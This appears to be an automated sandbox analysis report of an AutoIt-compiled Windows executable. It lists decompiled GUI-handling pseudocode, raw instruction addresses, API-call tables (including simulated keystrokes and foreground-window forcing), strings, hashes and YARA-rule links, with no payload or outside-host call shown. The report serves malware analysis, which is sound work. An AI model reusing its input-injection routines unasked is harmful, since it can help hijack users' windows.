						if(_t405 < 0xfffffdd9) {
							goto L8;
						}
						_t424 =  *0x4c1884; // 0xb6e518
						do {
							_t347 =  *( *(_t424 + _t403 * 4));
							__eflags = _t347;
							if(_t347 == 0) {
								goto L33;
							}
							__eflags = ( *(_t347 + 0x93) & 0x000000ff) - _t407[1];
							if(( *(_t347 + 0x93) & 0x000000ff) == _t407[1]) {
								break;
							}
							L33:
							_t403 = _t403 + 1;
							__eflags = _t403 - _t405;
						} while (_t403 <= _t405);
						__eflags = _t403 - _t405;
						if(_t403 > _t405) {
							goto L8;
						}
						E00422C1D( &(_t407[4]),  *((intOrPtr*)( *( *(_t424 + _t403 * 4)) + 0x54)), 0x4f);
						__eflags = 0;
						_t407[0x2b] = 0;
						goto L36;
					}
					__eflags = _t206 - 0xfffffe3d;
					if(_t206 == 0xfffffe3d) {
						goto L45;
					}
					__eflags = _t206 - 0xfffffe64;
					if(_t206 != 0xfffffe64) {
						goto L8;
					}
					_t425 =  *_t407;
					_t354 = GetWindowLongW(_t425, 0xfffffff0);
					__eflags = _t354 & 0x00000100;
					if((_t354 & 0x00000100) == 0) {
						goto L8;
					}
					__eflags = _t407[3] - 0x20;
					if(_t407[3] != 0x20) {
						goto L8;
					}
					_t369 = 0;
					_t355 = SendMessageW(_t425, 0x110a, 9, 0);
					__eflags = _t355;
					if(_t355 == 0) {
						goto L8;
					}
					_v92 = _t355;
					_v96 = 4;
					__eflags = SendMessageW(_t425, 0x113e, 0,  &_v96);
					goto L26;
				}
				if(_t431 == 0) {
					__eflags = 0;
					_t206 = SendMessageW( *_t407, 0x130b, 0, 0);
					L17:
					_push(_t206);
					goto L43;
				}
				if(_t206 == 0xfffffd09) {
					__eflags =  *((char*)(_t410 + 0x199));
					 *((char*)(_t410 + 0x19a)) = 1;
					if( *((char*)(_t410 + 0x199)) != 0) {
						goto L8;
					} else {
						 *((char*)(_t410 + 0x19a)) = 0;
						_push(_t407[2]);
						goto L43;
					}
				}
				if(_t206 == 0xfffffd0e) {
					 *((char*)(_t410 + 0x199)) = 1;
					goto L8;
				}
				if(_t206 == 0xfffffd0f) {
					__eflags =  *((char*)(_t410 + 0x19a)) - 1;
					if( *((char*)(_t410 + 0x19a)) == 1) {
						E0046DE72(_t407[1], _t206);
					}
					 *((short*)(_t410 + 0x199)) = 0;
					goto L8;
				}
				if(_t206 == 0xfffffd16) {
					goto L17;
				}
				goto L8;
			}

0x0046f5e9
0x0046f5ee
0x0046f5f4
0x0046f5f7
0x0046f603
0x0046f605
0x0046f608
0x0046f60c
0x0046f60e
0x0046f86f
0x0046f872
0x0046fa10
0x0046fa13
0x0046fd96
0x0046fd9b
0x0046fd9f
0x0046fda2
0x0046f645
0x0046f64e
0x0046f654
0x0046f65a
0x0046f65a
0x0046fda8
0x0046fdb1
0x0046fdb3
0x0046fdb3
0x0046fdb9
0x0046fdbb
0x0046fdc5
0x0046fdc8
0x0046fdc8
0x0046fdc9
0x0046fe7a
0x00000000
0x0046fe7a
0x0046fdcf
0x0046fdd4
0x00000000
0x00000000
0x0046fdda
0x0046fddc
0x0046fde3
0x0046fde5
0x0046fde5
0x0046fde5
0x0046fdf9
0x0046fdfe
0x0046fe00
0x0046fe09
0x0046fe0e
0x0046fe1c
0x0046fe22
0x0046fe27
0x00000000
0x00000000
0x0046fe29
0x0046fe2d
0x0046fe33
0x0046fe47
0x0046fe4c
0x0046fe4f
0x0046fe52
0x0046fe54
0x0046fe57
0x0046fe57
0x0046fe62
0x0046fe65
0x0046fe67
0x00000000
0x0046fe69
0x0046fe69
0x0046fe6b
0x0046fe73
0x0046fe73
0x00000000
0x0046fe73
0x0046fe6d
0x0046fe71
0x00000000
0x00000000
0x00000000
0x0046fe71
0x0046fe67
0x0046fe38
0x0046fe3a
0x0046fe41
0x00000000
0x00000000
0x00000000
0x0046fe02
0x0046fe02
0x0046fe02
0x00000000
0x0046fe02
0x0046fe00
0x0046fdbd
0x0046fdbf
0x00000000
0x00000000
0x00000000
0x0046fdbf
0x0046fa19
0x0046fa1c
0x0046fb73
0x0046fb77
0x0046fb81
0x0046fb8e
0x0046fb9d
0x0046fb9f
0x0046fba3
0x0046fba6
0x0046fbcf
0x0046fbcf
0x0046fbd4
0x0046fbdd
0x0046fbe3
0x0046fbe5
0x0046fcd1
0x0046fcd9
0x0046fcea
0x0046fcf0
0x0046fcf2
0x0046fd50
0x0046fd57
0x0046fd5d
0x0046fd67
0x0046fd6a
0x0046fd6c
0x00000000
0x00000000
0x0046fd87
0x0046f7b4
0x0046f7b6
0x00000000
0x0046f7b6
0x0046fcf4
0x0046fd05
0x0046fd0d
0x0046fd13
0x0046fd18
0x00000000
0x00000000
0x0046fd30
0x0046fd35
0x0046fd37
0x0046fd4c
0x0046fd4c
0x00000000
0x0046fd4c
0x0046fd39
0x0046fd3d
0x0046fd45
0x0046fd47
0x0046fd4a
0x00000000
0x00000000
0x00000000
0x0046fd4a
0x0046fbeb
0x0046fbed
0x00000000
0x00000000
0x0046fbf7
0x0046fbff
0x0046fc10
0x0046fc16
0x0046fc19
0x0046fc8f
0x0046fc96
0x0046fc9c
0x0046fca6
0x0046fca9
0x0046fcab
0x0046fcc2
0x0046fcc2
0x00000000
0x0046fcab
0x0046fc1b
0x0046fc1f
0x00000000
0x00000000
0x0046fc21
0x0046fc35
0x0046fc40
0x0046fc46
0x0046fc48
0x00000000
0x00000000
0x0046fc4e
0x0046fc53
0x00000000
0x00000000
0x0046fc6b
0x0046fc70
0x0046fc72
0x0046fc8b
0x0046fc8b
0x00000000
0x0046fc8b
0x0046fc74
0x0046fc78
0x0046fc80
0x0046fc82
0x0046fc84
0x00000000
0x00000000
0x0046fc86
0x0046fc89
0x00000000
0x00000000
0x00000000
0x0046fc89
0x0046fbbb
0x0046fbbd
0x0046fbc1
0x0046fbc4
0x00000000
0x00000000
0x0046fbca
0x00000000
0x0046fbca
0x0046fa22
0x0046fa25
0x00000000
0x00000000
0x0046fa30
0x0046fa3a
0x0046fa47
0x0046fa51
0x0046fa56
0x0046fa59
0x00000000
0x00000000
0x0046fa5f
0x0046fa6a
0x0046fa70
0x0046fa72
0x00000000
0x00000000
0x0046fa78
0x0046fa7a
0x0046faf7
0x0046faff
0x0046fb12
0x0046fb14
0x0046fb16
0x0046fb1c
0x0046fb2d
0x0046fb35
0x0046fb3d
0x0046fb3f
0x0046fb44
0x0046fb55
0x0046fb60
0x0046fb60
0x0046fb44
0x00000000
0x0046fb16
0x0046fa7c
0x0046fa7e
0x00000000
0x00000000
0x0046fa8e
0x0046fa96
0x0046faa9
0x0046faab
0x0046faae
0x00000000
0x00000000
0x0046fab4
0x0046fac8
0x0046fad3
0x0046fad5
0x0046fada
0x00000000
0x00000000
0x0046fae0
0x0046fae1
0x0046f804
0x0046f804
0x00000000
0x0046f804
0x0046f878
0x0046fa05
0x00000000
0x0046fa05
0x0046f87e
0x0046f883
0x0046f9f4
0x0046f9fa
0x00000000
0x0046f9fa
0x0046f889
0x0046f88e
0x00000000
0x00000000
0x0046f894
0x0046f897
0x0046f956
0x0046f967
0x0046f970
0x0046f97d
0x0046f982
0x0046f986
0x0046f98a
0x0046f992
0x0046f9a6
0x0046f9aa
0x0046f9ae
0x0046f9c0
0x0046f9c9
0x0046f9ce
0x0046f9d4
0x0046f9e0
0x0046f9ea
0x0046f89d
0x0046f89d
0x0046f8a0
0x0046f8a6
0x0046f8b6
0x0046f8bb
0x0046f8bd
0x0046f8c3
0x0046f8d8
0x0046f8e2
0x0046f8e7
0x0046f8ed
0x0046f8f4
0x0046f8f6
0x0046f8f9
0x0046f8ff
0x0046f913
0x0046f918
0x0046f931
0x0046f940
0x0046f940
0x0046f8f9
0x0046f8bd
0x0046f8a0
0x00000000
0x0046f897
0x0046f614
0x0046f80e
0x0046f814
0x0046f820
0x0046f822
0x0046f824
0x00000000
0x00000000
0x0046f82a
0x0046f83b
0x0046f843
0x0046f845
0x0046f847
0x00000000
0x00000000
0x0046f850
0x0046f853
0x00000000
0x00000000
0x0046f859
0x0046f860
0x00000000
0x00000000
0x0046f866
0x0046f73f
0x0046f73f
0x00000000
0x00000000
0x0046f745
0x0046f746
0x00000000
0x0046f746
0x0046f61f
0x0046f621
0x0046f6b9
0x0046f6be
0x0046f7c4
0x0046f7c6
0x0046f7c9
0x00000000
0x00000000
0x0046f7d1
0x0046f7d3
0x0046f7d6
0x00000000
0x00000000
0x0046f7ef
0x0046f7f1
0x0046f7f7
0x0046f7fa
0x0046f7ff
0x0046f7ff
0x0046f7fc
0x0046f7fc
0x0046f7fc
0x0046f800
0x0046f801
0x0046f801
0x00000000
0x0046f801
0x0046f6c4
0x0046f6c9
0x0046f74f
0x0046f756
0x00000000
0x00000000
0x0046f75c
0x0046f764
0x0046f765
0x0046f767
0x00000000
0x00000000
0x0046f76d
0x0046f773
0x0046f776
0x0046f778
0x0046f77a
0x00000000
0x00000000
0x0046f783
0x0046f786
0x00000000
0x00000000
0x0046f788
0x0046f788
0x0046f789
0x0046f789
0x0046f78d
0x0046f78f
0x00000000
0x00000000
0x0046f7a3
0x0046f7ab
0x0046f7ad
0x00000000
0x0046f7ad
0x0046f6cf
0x0046f6d4
0x00000000
0x00000000
0x0046f6da
0x0046f6df
0x00000000
0x00000000
0x0046f6e5
0x0046f6ea
0x0046f6f0
0x0046f6f5
0x00000000
0x00000000
0x0046f6fb
0x0046f700
0x00000000
0x00000000
0x0046f706
0x0046f711
0x0046f717
0x0046f719
0x00000000
0x00000000
0x0046f71f
0x0046f72f
0x0046f73d
0x00000000
0x0046f73d
0x0046f627
0x0046f6a2
0x0046f6ad
0x0046f6b3
0x0046f6b3
0x00000000
0x0046f6b3
0x0046f62e
0x0046f683
0x0046f68a
0x0046f691
0x00000000
0x0046f693
0x0046f693
0x0046f69a
0x00000000
0x0046f69a
0x0046f691
0x0046f635
0x0046f67a
0x00000000
0x0046f67a
0x0046f63c
0x0046f65d
0x0046f664
0x0046f66a
0x0046f66a
0x0046f671
0x00000000
0x0046f671
0x0046f643
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 0046F64E
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046F6AD
GetWindowLongW.USER32(?,000000F0), ref: 0046F6EA
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046F711
SendMessageW.USER32 ref: 0046F737
_wcsncpy.LIBCMT ref: 0046F7A3
GetKeyState.USER32(00000011), ref: 0046F7C4
GetKeyState.USER32(00000009), ref: 0046F7D1
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046F7E7
GetKeyState.USER32(00000010), ref: 0046F7F1
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046F820
SendMessageW.USER32 ref: 0046F843
SendMessageW.USER32(?,00001030,?,0046DE69), ref: 0046F940
SetCapture.USER32(?), ref: 0046F970
ClientToScreen.USER32(?,?), ref: 0046F9D4
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0046F9FA
ReleaseCapture.USER32 ref: 0046FA05
GetCursorPos.USER32(?), ref: 0046FA3A
ScreenToClient.USER32(?,?), ref: 0046FA47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FAA9
SendMessageW.USER32 ref: 0046FAD3
SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FB12
SendMessageW.USER32 ref: 0046FB3D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0046FB55
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0046FB60
GetCursorPos.USER32(?), ref: 0046FB81
ScreenToClient.USER32(?,?), ref: 0046FB8E
GetParent.USER32(?), ref: 0046FBAA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FC10
SendMessageW.USER32 ref: 0046FC40
ClientToScreen.USER32(?,?), ref: 0046FC96
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0046FCC2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FCEA
SendMessageW.USER32 ref: 0046FD0D
ClientToScreen.USER32(?,?), ref: 0046FD57
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0046FD87
GetWindowLongW.USER32(?,000000F0), ref: 0046FE1C

Strings

@GUI_DRAGID, xrefs: 0046F99D
F, xrefs: 0046FD13

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3461372671-4164748364
Opcode ID: 114dda31e77abde06ef0841189ee7a90047f956c2fe5362640a3c240d9912ff9
Instruction ID: 9b7e4ec0c6f27ae42797ce0940e2eaa5163db462d636d0476bd8ad95b90565f0
Opcode Fuzzy Hash: 114dda31e77abde06ef0841189ee7a90047f956c2fe5362640a3c240d9912ff9
Instruction Fuzzy Hash: EA32BB70604305AFD710EF28D884EAABBE4BF49358F144A2AF595872B1E735DC09CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0046A8DC, Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0046AFDB

Strings

%d/%02d/%02d, xrefs: 0046AD0A

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 426468a311a3ab58f115549a6d04381ec9c3d83952c307cb571a48edaec17371
Instruction ID: 4e68f8ef8392c241a72e03d8564e3966aecce025f7589420d9e868581a9f9f23
Opcode Fuzzy Hash: 426468a311a3ab58f115549a6d04381ec9c3d83952c307cb571a48edaec17371
Instruction Fuzzy Hash: 8112F2B1600618ABEB249F65DC49FAE7BB8FF45310F10412AF505AB2E1E7788911CF1B

Uniqueness

Uniqueness Score: -1.00%

Function 0041F78E, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0041F796
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00474388
IsIconic.USER32(000000FF), ref: 00474391
ShowWindow.USER32(000000FF,00000009), ref: 0047439E
SetForegroundWindow.USER32(000000FF), ref: 004743A8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004743BE
GetCurrentThreadId.KERNEL32 ref: 004743C5
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 004743D1
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004743E2
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004743EA
AttachThreadInput.USER32(00000000,?,00000001), ref: 004743F2
SetForegroundWindow.USER32(000000FF), ref: 004743F5
MapVirtualKeyW.USER32(00000012,00000000), ref: 0047440A
keybd_event.USER32(00000012,00000000), ref: 00474415
MapVirtualKeyW.USER32(00000012,00000000), ref: 0047441F
keybd_event.USER32(00000012,00000000), ref: 00474424
MapVirtualKeyW.USER32(00000012,00000000), ref: 0047442D
keybd_event.USER32(00000012,00000000), ref: 00474432
MapVirtualKeyW.USER32(00000012,00000000), ref: 0047443C
keybd_event.USER32(00000012,00000000), ref: 00474441
SetForegroundWindow.USER32(000000FF), ref: 00474444
AttachThreadInput.USER32(000000FF,?,00000000), ref: 0047446B

Strings

Shell_TrayWnd, xrefs: 00474383

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: f4581f27db02f6c6a184c40d081a801eaaeabdedeb699b47bae969acb40baff7
Instruction ID: 392fd4d66437b76ee79ff59a7b1f61850ffb529fba41fd5400bf75a8b4ea929a
Opcode Fuzzy Hash: f4581f27db02f6c6a184c40d081a801eaaeabdedeb699b47bae969acb40baff7
Instruction Fuzzy Hash: D3317771E40218BBEB216B719C49FBF7F6CEB84B50F10442AFA09A61D0D7B45901AB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDF0, Relevance: 39.1, APIs: 12, Strings: 10, Instructions: 643COMMON

Download Yara Rule

APIs

Part of subcall function 0040CAEE: _memmove.LIBCMT ref: 0040CB2F

GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,004C22E8,?,00000000,?,00403E2E,?,00000000,?,0049DBF0,00000000,?), ref: 0040BE8B
GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00403E2E,?,00000000,?,0049DBF0,00000000,?,00000002), ref: 0040BEA7
__wsplitpath.LIBCMT ref: 0040BF19

Part of subcall function 0042297D: __wsplitpath_helper.LIBCMT ref: 004229BD

_wcscpy.LIBCMT ref: 0040BF31
_wcscat.LIBCMT ref: 0040BF46
SetCurrentDirectoryW.KERNEL32(?), ref: 0040BF56
_wcscpy.LIBCMT ref: 0040C03E
_wcscpy.LIBCMT ref: 0040C1ED
SetCurrentDirectoryW.KERNEL32 ref: 0040C250

Part of subcall function 0042010A: _malloc.LIBCMT ref: 00420122

Part of subcall function 0042010A: std::exception::exception.LIBCMT ref: 0042013E
Part of subcall function 0042010A: __CxxThrowException@8.LIBCMT ref: 00420153

Part of subcall function 0040C320: _memmove.LIBCMT ref: 0040C419

Strings

Error opening the file, xrefs: 00473593, 00473639
EA06, xrefs: 004735AA
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00473577
AU3!, xrefs: 0040BEE0
Bad directive syntax error, xrefs: 0047393E
_, xrefs: 0040C281
>>>AUTOIT SCRIPT<<<, xrefs: 00473611
"L, xrefs: 0040C207
Unterminated string, xrefs: 004739E1
G-@, xrefs: 0047366E, 004736A8

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::exception::exception
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$G-@$Unterminated string$_$"L
API String ID: 3217782727-4170656748
Opcode ID: 5edd0395da46bdf9308d068e06c7036fcc6655d2a25937eedede6d5deb77c095
Instruction ID: e66bcae230bc0cb4803fe900963db24ef609d18376314f11926b27ddc506fb3f
Opcode Fuzzy Hash: 5edd0395da46bdf9308d068e06c7036fcc6655d2a25937eedede6d5deb77c095
Instruction Fuzzy Hash: C242C271508341DFD710EF61C881BABB7E8AF84304F00492EF58597292DB79DA49DB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0046F122, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

DragQueryPoint.SHELL32(?,?), ref: 0046F14B

Part of subcall function 0046D5EE: ClientToScreen.USER32(?,?), ref: 0046D617
Part of subcall function 0046D5EE: GetWindowRect.USER32(?,?), ref: 0046D68D
Part of subcall function 0046D5EE: PtInRect.USER32(?,?,0046EB2C), ref: 0046D69D

SendMessageW.USER32(?,000000B0,?,?), ref: 0046F1B4
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F1BF
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F1E2
_wcscat.LIBCMT ref: 0046F212
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F229
SendMessageW.USER32(?,000000B0,?,?), ref: 0046F242
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F259
SendMessageW.USER32(?,000000B1,?,?), ref: 0046F27B
DragFinish.SHELL32(?), ref: 0046F282
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0046F36D

Strings

@GUI_DRAGFILE, xrefs: 0046F31C
@GUI_DROPID, xrefs: 0046F2A2
@GUI_DRAGID, xrefs: 0046F2E1

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2166380349-3440237614
Opcode ID: c6deb6dd71d20501d43a869fa62ffc6e91b5cac29ac88ac840e43bb7172b12c7
Instruction ID: dc842424c3d66b35c7cfbb6c33bc8afbc3735740b6d5f548a71f8578122a5678
Opcode Fuzzy Hash: c6deb6dd71d20501d43a869fa62ffc6e91b5cac29ac88ac840e43bb7172b12c7
Instruction Fuzzy Hash: 19615C71508304AFC700EF61DC85E9FBBE8FF89754F000A2EF595921A1DB749649CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0042BDF6, Relevance: 21.5, APIs: 14, Instructions: 537COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a093696637cc886a91dd1601fa4710ba9e2bb35943d794f10a85e43fe0aa8f
Instruction ID: ea9175fb35a6eafdbe712dd96a70f13a45d89f3b188da1a06ff961336a37e447
Opcode Fuzzy Hash: e7a093696637cc886a91dd1601fa4710ba9e2bb35943d794f10a85e43fe0aa8f
Instruction Fuzzy Hash: 85325E75B022289BDB248F55ED816EEB7B5FF46310F4440DAE40AE7A81D7349E80CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0046ECBC, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0046ED0C
GetFocus.USER32 ref: 0046ED1C
GetDlgCtrlID.USER32(00000000), ref: 0046ED27
_memset.LIBCMT ref: 0046EE52
GetMenuItemInfoW.USER32 ref: 0046EE7D
GetMenuItemCount.USER32(00000000), ref: 0046EE9D
GetMenuItemID.USER32(?,00000000), ref: 0046EEB0
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0046EEE4
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0046EF2C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0046EF64
NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0046EF99

Strings

0, xrefs: 0046EE4A

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
String ID: 0
API String ID: 3616455698-4108050209
Opcode ID: 320a572bf3f114ec055b94b424738f4c9d50bcbd03713c1333988fc8515bbf3f
Instruction ID: c315fb72281840599f7bc80b86fb032a00e76e3087e91a2058456b8266b3225d
Opcode Fuzzy Hash: 320a572bf3f114ec055b94b424738f4c9d50bcbd03713c1333988fc8515bbf3f
Instruction Fuzzy Hash: 5F81BE75608301AFDB14DF16D884A6BBBE4FF88358F10092EF99497291E735D901CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00405D32, Relevance: 17.1, Strings: 13, Instructions: 810COMMON

Download Yara Rule

Strings

CRLF), xrefs: 0040624B
BSR_UNICODE), xrefs: 00483885
LF), xrefs: 00406234
LIMIT_MATCH=, xrefs: 004061EF
NO_START_OPT), xrefs: 004061D8
UTF16), xrefs: 00406193
CR), xrefs: 0040621D
LIMIT_RECURSION=, xrefs: 00406206
UTF), xrefs: 004061AA
ANY), xrefs: 00406262
ANYCRLF), xrefs: 00406279
BSR_ANYCRLF), xrefs: 00406290
UCP), xrefs: 004061C1

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-2893523900
Opcode ID: ab0ef2b1380dbb889790e554fcfd7f7ba95ab10762c0d2f254a5c995a0b7deed
Instruction ID: beaa6668ae8e5097ef65a79a51379ac6023e602a9d2fa139517b577d9bde8590
Opcode Fuzzy Hash: ab0ef2b1380dbb889790e554fcfd7f7ba95ab10762c0d2f254a5c995a0b7deed
Instruction Fuzzy Hash: 0762AFB1E002198BDF24DF59C8807AEB7B1BF48710F15856BE846EB381D7789E41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00408CA0, Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00408FCB
